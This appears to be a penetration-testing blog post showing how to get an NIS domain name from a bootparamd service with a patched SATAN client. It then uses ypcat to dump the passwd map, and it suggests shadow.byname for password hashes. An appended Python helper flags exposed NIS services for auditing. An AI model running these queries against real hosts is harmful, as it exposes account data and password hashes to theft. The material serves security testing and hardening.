Finding the NIS Domain Name from Bootparamd
NIS (Network Information Service) is not a particularly common protocol on modern internal networks. This is for good reason, considering its security weaknesses. Its presence is often a gift to penetration testers (and probably hackers too). This blog entry briefly documents one way that the all-important NIS Domain Name can be found remotely.
SATAN includes a nice little tool called “boot” which can remotely query the bootparamd service, often found running on the NIS server. I tweaked this slightly so that it compiles under Linux (I’ve only tried it on Gentoo). Download my hacked-up copy here.
First locate a host that is running both ypserv and bootparamd. This is invariably a Solaris host, but in this example it’s Debian:
$ rpcinfo -p 192.168.20.128
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp    749  status
    100024    1   tcp    752  status
    100004    2   udp   1017  ypserv
    100004    1   udp   1017  ypserv
    100004    2   tcp   1020  ypserv
    100004    1   tcp   1020  ypserv
    100009    1   udp   1020  yppasswdd
 600100069    1   udp   1022  fypxfrd
 600100069    1   tcp    600  fypxfrd
    100007    2   udp    605  ypbind
    100007    1   udp    605  ypbind
    100007    2   tcp    608  ypbind
    100007    1   tcp    608  ypbind
    100026    1   udp    603  bootparam
Now compile the bootparam client, then use it to query the bootparamd service.
$ tar xfz satan-bootparamd-client-ptm-patch.tar.gz
$ cd satan-bootparamd-client-ptm-patch
$ ls -l
total 12
-rw------- 1 ml ml  399 Jun 17 12:50 Makefile
-rw------- 1 ml ml 2461 Jun 17 12:50 boot.c
-rw------- 1 ml ml 3019 Jun 17 12:50 bootparam_prot.x
$ make
You need to supply the “boot” program with a client IP address and a server IP address.
$ ./boot
Usage: ./boot bootclient bootserver
In this example at least, the server had to be set up specifically to serve a fictitious client (by editing /etc/bootparams). If you get a message like the following, try a different client IP address:
$ ./boot 192.168.20.99 192.168.20.128
me: cannot contact bootparam server at 192.168.20.128 for 192.168.20.99: RPC: Timed out
A successful response will look like this:
$ ./boot 192.168.20.3 192.168.20.128
client_name: someclient
domain_name: mynisdom
router_addr: 192.168.20.128
Once you have the NIS Domain Name, you can grab the passwd file as follows:
$ ypcat -h 192.168.20.128 -d mynisdom passwd.byname
user:x:1000:1000:user,,,:/home/user:/bin/bash
ptm:x:1001:100::/home/ptm:
If you’re really lucky it’ll contain the password hashes too (also try to grab shadow.byname if it doesn’t).
If you’re unable to extract the NIS domain name from bootparamd, you could try querying other available services (FTP, SMTP, NFS, etc.) in order to find the DNS Domain name or some host names. The NIS domain name could be similar to the DNS domain name, or to hostnames – but isn’t necessarily. YMMV.
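As an added audit helper (not part of this post, of SATAN, or of the patched “boot” client), the following Python parses rpcinfo -p output like the listing above and reports which NIS-related RPC services a host exposes, so that a ypserv/bootparamd combination can be spotted during an inventory sweep and restricted or disabled. The sample input is a constructed subset of the rpcinfo output shown earlier; the program numbers are the ones printed there.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the rpcinfo -p output shown in the post.
SAMPLE_RPCINFO = """\
   program vers proto   port
    100000    2   tcp    111  portmapper
    100004    2   udp   1017  ypserv
    100004    1   udp   1017  ypserv
 600100069    1   udp   1022  fypxfrd
    100026    1   udp    603  bootparam
"""

# RPC program numbers of the NIS-related services, as printed by rpcinfo above.
NIS_PROGRAMS = {100004: "ypserv", 100009: "yppasswdd", 100007: "ypbind",
                100026: "bootparam", 600100069: "fypxfrd"}

ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")

def parse_rpcinfo(text):
    """Turn `rpcinfo -p` output into (program, version, proto, port, name) tuples;
    the header line and any non-table line is skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            prog, vers, proto, port, name = m.groups()
            rows.append((int(prog), int(vers), proto, int(port), name or ""))
    return rows

def nis_exposure(text):
    """Map each exposed NIS-related service to the sorted proto/port pairs it listens on."""
    found = defaultdict(set)
    for prog, _vers, proto, port, _name in parse_rpcinfo(text):
        if prog in NIS_PROGRAMS:  # keyed on program number, not on the name column
            found[NIS_PROGRAMS[prog]].add(f"{proto}/{port}")
    return {svc: sorted(ports) for svc, ports in found.items()}

def findings(text):
    """Audit findings, leading with the combination the post demonstrates."""
    exp = nis_exposure(text)
    out = []
    if "ypserv" in exp and "bootparam" in exp:
        out.append("ypserv and bootparamd both reachable: bootparamd can disclose the "
                   "NIS domain name, after which NIS maps can be read with ypcat")
    for svc in ("yppasswdd", "fypxfrd", "ypbind"):
        if svc in exp:
            out.append(f"{svc} reachable on {', '.join(exp[svc])}: confirm it is required")
    return out
```

Feed it the saved output of rpcinfo -p for each host in scope; an empty findings list means no NIS-related program was registered with the portmapper.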